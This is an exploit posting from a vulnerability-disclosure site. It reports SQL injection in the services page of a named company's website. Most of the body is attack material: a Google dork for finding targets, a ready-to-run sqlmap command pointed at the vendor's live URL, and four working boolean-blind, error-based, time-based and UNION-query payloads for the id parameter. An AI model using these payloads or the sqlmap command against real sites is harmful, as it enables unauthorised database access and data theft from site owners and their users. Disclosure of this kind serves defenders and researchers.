CRWETECH - SQL Injection vulnerability

2020.08.31
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

**************************** #Exploit Title: CRWETECH - SQL Injection vulnerability #Date: 2020-08-31 #Exploit Author: Mahdi Karimi #Vendor Homepage: http://www.crwetech.com #Google Dork: Services.php?ID= #Tested On: windows 10 sqlmap: sqlmap -u "http://www.crwetech.com/services.php?id=4" --level=5 --risk=3 --dbs --random-agent Testing Method; - AND/OR time-based blind - boolean-based blind - UNION query - error-based Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=4 AND 3290=3290 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=4 AND (SELECT 8417 FROM(SELECT COUNT(*),CONCAT(0x71767a7671,(SELECT (ELT(8417=8417,1))),0x71717a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=4 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: id=4 UNION ALL SELECT NULL,CONCAT(0x71767a7671,0x4b5065595268766c64587063556a52546944454464586446777446746e5148484863435271764177,0x71717a6271),NULL,NULL,NULL-- gfBE ************************************************** #Discovered by: Mahdi Karimi #Email : mjoker22mjoker22@gmail.com **************************************************


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top